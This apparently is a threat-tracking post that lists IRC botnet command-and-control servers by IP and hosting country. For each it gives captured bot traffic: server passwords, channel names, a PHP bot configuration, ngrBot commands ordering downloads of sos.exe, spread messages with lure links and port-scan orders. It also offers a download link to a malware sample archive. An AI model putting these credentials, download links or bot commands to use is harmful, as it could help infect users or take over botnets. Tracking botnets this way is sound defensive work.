208.75.182.230 6667 NICK Owned-22765 USER uihamq 0 0 :Owned-22765 USERHOST Owned-22765 MODE Owned-22765 +x JOIN #firefly art PONG :IURJE_}h[O infos about hosting: http://whois.domaintools.com/208.75.182.230
92.241.165.156(irc botnet hosted in Russian Federation 2×4.ru Network)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 63.135.80.46 80 69.171.224.13 80 92.241.165.156 1234 PASS xxx NICK NEW-[USA|00|P|64628] USER XP-8137 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|64628] -ix JOIN #!nw! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/92.241.165.156
216.24.203.46(irc botnet hosted in United States Walnut Psychz Networks)
Remote Host Port Number 216.24.203.46 6667 PASS system-code.net NICK [2778|USA|XP|Z3R0x] USER 2778 “” “lol” :2778 PONG :DDCE16AF JOIN #Sgrulla-Botnet 26209 infos about hosting: http://whois.domaintools.com/216.24.203.46
28 mb executable samples
this package is around 28mb of diferent malwares have fun searching inside Download: http://8c75276e.goneviral.com
196.212.26.149(linux botnet hosted in South Africa Cape Town Afrinic)
var $config = array(“server”=>”196.212.26.149”, “port”=>6667, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”#botovi”, “key”=>”123456”, // “modes”=>”-x+i”, “password”=>”botko”, // “trigger”=>”!say@”, “hostauth”=>”*” // * infos about hosting: http://whois.domaintools.com/196.212.26.149
72.55.132.187(irc botnet hosted in Canada Zenkis.ca)
Remote Host Port Number 213.251.170.52 80 72.55.132.187 2603 PASS ngrBot NICK n{US|XPa}pszjwcb USER pszjwcb 0 0 :pszjwcb JOIN #phcrulez ngrBot * Now talking in #phcrulez * Topic is ” * Set by Ko0l on Mon Apr 11 01:39:26 infos about hosting: http://whois.domaintools.com/72.55.132.187
125.22.97.146(irc botnet hosted in India Bangalore Madura Coats)
server: 125.22.97.146:6667 Current Local Users: 64 Max: 167 Current Global Users: 64 Max: 167 chanel: #sos# * Now talking in #sos# * Topic is ‘@download https://rs461l32.rapidshare.com/files/459011368/sos.exe 1, ‘ * Set by ^Crash^ on Mon Apr 25 17:41:45
abc.radiozeri.de(irc botnet hosted in Taiwan Taipei Taiwan Fixed Network Co. Ltd)
Dns resolved abc.radiozeri.de to 61.31.99.67 ircd: 61.31.99.67:81 chanel: #sos# * Now talking in #sos# * Topic is ” * Set by mofo on Mon Apr 25 14:58:51 .s /99/106/112/81/55/59/40/104/113/121/35/102/121/51/113/98/117/109/126/122/102/124/38/86/75/119/107/117/121/58/43/62/48/55/51/16/48/50/ mx (r00t@bossman) Quit (Ping timeout) UPDATE: Remote Host Port Number 195.122.131.7 80 213.251.170.52 80 59.76.142.100 4042 PASS ngrBot JOIN #US JOIN #new PRIVMSG #boss :[d=”http://rapidshare.com/files/460738009/sos.exe”] ErrorRead more...
115.146.19.158(irc botnet hosted in Japan Tokyo Kddi Web Communications Inc)
Remote Host Port Number 115.146.19.158 4042 PASS ngrBot 213.251.170.52 80 JOIN #US NICK n{US|XPa}iqwtaan USER iqwtaan 0 0 :iqwtaan JOIN #boss ngrBot PRIVMSG #boss :[HTTP]: Updated HTTP spread interval to “6” PRIVMSG #boss :[HTTP]: Updated HTTP spread message to “wow album 🙂 http://tiny.cc/facebook-photos-24042011” PRIVMSG #boss :[MSN]: Updated MSN spread interval to “6” PRIVMSG #boss :[MSN]:Read more...
46.45.156.126(irc botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)
Remote Host Port Number 192.168.146.2 445 46.45.156.126 81 ircd here 74.206.242.164 80 NICK [N00_USA_XP_1986626] PRIVMSG [N00_USA_XP_1986 @ :scan; Sequential Port Scan started on 192.168.146.0:445 with a delay of 5 seconds for 0 minutes using 10 threads. USER SP2-189 * 0 :COMPUTERNAME @ :scan; Random Port Scan started on 174.133.x.x:445 with a delay of 5 secondsRead more...